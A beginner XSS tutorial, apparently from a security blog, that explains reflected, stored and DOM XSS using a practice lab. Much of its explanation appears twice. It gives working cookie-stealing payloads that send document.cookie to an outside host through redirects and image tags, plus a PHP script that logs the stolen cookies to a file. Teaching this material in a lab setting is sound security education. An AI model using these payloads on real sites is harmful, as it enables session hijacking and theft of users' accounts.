Hey, Guys! so We are finally finished with the basics of JavaScript :D required to find and Exploit XSS. This tutorial will not be on Finding XSS (We will also talk about that & its different contexts etc..in the next one)
Now, There are 3 Types of XSS
1. Reflected or Non-Persistent XSS:
In This type of XSS, the attacker needs to share a link with Victim and that Will cause Malicious JavaScript to execute. However, XSS will execute on Visting that Specific link with specific XSS Payload only ie. It is not stored and is non-persistent as the name says. The XSS Vector Could be in GET or POST request.
2. Stored or Persistent XSS:
It Occurs in Places Where a Malicious User input Containing XSS Vector is stored or "saved". Thus It may (happens mostly..) cause Multiple User to be affected. Stored XSS could be in User's Name/Comments Section/Group Name/Status/TimeLine/Some Uploaded File Name ie. Some Functionalities/Inputs which could be shared with other Users too, causing multiple users to be affected.
3. DOM XSS:
This a Category of XSS Which could again be both "Stored" or "Reflected".This happens when XSS could be Executed (Sink) in Existing "JavaScript" on the Page itself via an Untrusted User Input(Source). We Will Discuss DOM XSS in details in a Separate Tutorial.
NOTE: There's another Category of XSS Called as "Self-XSS" Which is a situation in Which you have Found an XSS Vulnerability (of any type of above listed Three) but it Could not be Shared With any User Except for their Own selves ie. it could not be used to Exploit any User. However, Under some circumstances, it is even possible to convert Self-XSS to an Exploitable One Which is also left for another Upcoming Tutorial.
So again, in this Tutorial We would be talking about "Very Basics of XSS", details regarding Finding XSS's and Different Contexts of XSS would be covered in depth in the next tutorial. First of all in any User Input Try Putting a Simple HTML Tag like <B>, <S>, <I>, <h1>.. etc to Confirm if you are able to inject HTML.
Some Examples could be(You could use any suitable Event Handler other than these):
NOTE: Remember To URL Encode "+" to %2b in a GET Request otherwise it is treated a WhiteSpace
We Could also make a Simple PHP Script to Capture The Cookies and Save it in a File instead of Checking our Server Logs in case we don't have access.
Code: capture.php
We can do it in following manner:
You can also use document.write() to directly add write something to the page.
A Cookie has the following format:
Cookie: CookieName=CookieValue; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; Domain=example.com;Secure; HttpOnly
Cookies are separated by ';'
So, That's it for this Tutorial, I wanted people to Know How To Exploit a Very Basic XSS by Stealing User Cookies and In The Next Tutorial We would look at in-depth Finding XSS and Different Contexts of XSS. Stay Tuned!
What is Cross-site scripting (XSS)?
XSS is an attack vector that an attacker could use to inject JavaScript into a Website and exploit it by stealing user's sessions, perform CSRF actions on behalf of victim basically bypassing SOP (Same Origin Policy) about which we talked in JavaScript Final tutorial.Now, There are 3 Types of XSS
1. Reflected or Non-Persistent XSS:
In This type of XSS, the attacker needs to share a link with Victim and that Will cause Malicious JavaScript to execute. However, XSS will execute on Visting that Specific link with specific XSS Payload only ie. It is not stored and is non-persistent as the name says. The XSS Vector Could be in GET or POST request.
2. Stored or Persistent XSS:
It Occurs in Places Where a Malicious User input Containing XSS Vector is stored or "saved". Thus It may (happens mostly..) cause Multiple User to be affected. Stored XSS could be in User's Name/Comments Section/Group Name/Status/TimeLine/Some Uploaded File Name ie. Some Functionalities/Inputs which could be shared with other Users too, causing multiple users to be affected.
3. DOM XSS:
This a Category of XSS Which could again be both "Stored" or "Reflected".This happens when XSS could be Executed (Sink) in Existing "JavaScript" on the Page itself via an Untrusted User Input(Source). We Will Discuss DOM XSS in details in a Separate Tutorial.
NOTE: There's another Category of XSS Called as "Self-XSS" Which is a situation in Which you have Found an XSS Vulnerability (of any type of above listed Three) but it Could not be Shared With any User Except for their Own selves ie. it could not be used to Exploit any User. However, Under some circumstances, it is even possible to convert Self-XSS to an Exploitable One Which is also left for another Upcoming Tutorial.
So again, in this Tutorial We would be talking about "Very Basics of XSS", details regarding Finding XSS's and Different Contexts of XSS would be covered in depth in the next tutorial. First of all in any User Input Try Putting a Simple HTML Tag like <B>, <S>, <I>, <h1>.. etc to Confirm if you are able to inject HTML.
http://leettime.net/xsslab1/chalg1.php?name=<h1>SomeRandomText</h1>http://leettime.net/xsslab1/chalg1.php?name=<script>alert("Checking")</script>Some Examples could be(You could use any suitable Event Handler other than these):
http://leettime.net/xsslab1/chalg1.php?name=<body onload="alert(1)">http://leettime.net/xsslab1/chalg1.php?name=<h1 onmouseover="alert(1)">Hoverhttp://leettime.net/xsslab1/chalg1.php?name=<input onfocus="alert(1)" autofocus>Stealing User's Cookies
JavaScript could be used to Access a User's Cookies as well using "document.cookie" property which we had discussed so one could steal a Victim's Session. Let us use the Classic <script> tags only for now.http://leettime.net/xsslab1/chalg1.php?name=<script>alert(document.cookie)</script>NOTE: Remember To URL Encode "+" to %2b in a GET Request otherwise it is treated a WhiteSpace
http://leettime.net/xsslab1/chalg1.php?name=<script>location.href="https://securityidiots.com/?mycookies="+document['cookie']</script>We Could also make a Simple PHP Script to Capture The Cookies and Save it in a File instead of Checking our Server Logs in case we don't have access.
Code: capture.php
<?php
if(isset($_GET['mycookies']))
file_put_contents("Cookies.txt",$_GET['mycookies'],FILE_APPEND);
?>http://leettime.net/xsslab1/chalg1.php?name=<script>location.href="https://securityidiots.com/capture.php?mycookies="%2bdocument.cookie</script>We can do it in following manner:
<script>
var imgtag = document.createElement("img");//creates img element
imgtag.src="http://securityidiots.com/capture.php?mycookies="+document.cookie;//adds attribute src to img element
document.body.appendChild(imgtag);//appends the created element to the body tag of the DOM
</script>http://leettime.net/xsslab1/chalg1.php?name=<script>var x=document.createElement("img");x.src="http://securityidiots.com/capture.php?mycookies="+document['cookie'];document.body.appendChild(x);</script>http://leettime.net/xsslab1/chalg1.php?name=<script>var x=new Image();x.src="http://securityidiots.com/capture.php?mycookies="+document['cookie'];document.body.appendChild(x);</script>You can also use document.write() to directly add write something to the page.
http://leettime.net/xsslab1/chalg1.php?name=<script>document.write('<img src="http://securityidiots.com/capture.php?mycookies='+document['cookie']+'">')</script>A Cookie has the following format:
Cookie: CookieName=CookieValue; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; Domain=example.com;Secure; HttpOnly
Cookies are separated by ';'
| "Expires": | decides the time of cookie to expire, if you Enter a Time of Past it gets expired immediately |
| "Path": | decides Cookies should be available from Which Path of the Site |
| "Domain": | Tells Which domain to send cookies to. If it is not specified its limited to the current domain otherwise if specified it applies to its subdomains too |
| "Secure": | Specifies that Cookies should be sent only over HTTPS connection |
| "HttpOnly": | if Specified, means that Javascript would not be able to access Cookies. So, in this Case, We Could not Steal any User/Admin Cookies as document.cookie would return an empty string and Thus We can only perform CSRF actions on his behalf Which We Would also Cover in one of the upcoming Tutorials. |
So, That's it for this Tutorial, I wanted people to Know How To Exploit a Very Basic XSS by Stealing User Cookies and In The Next Tutorial We would look at in-depth Finding XSS and Different Contexts of XSS. Stay Tuned!
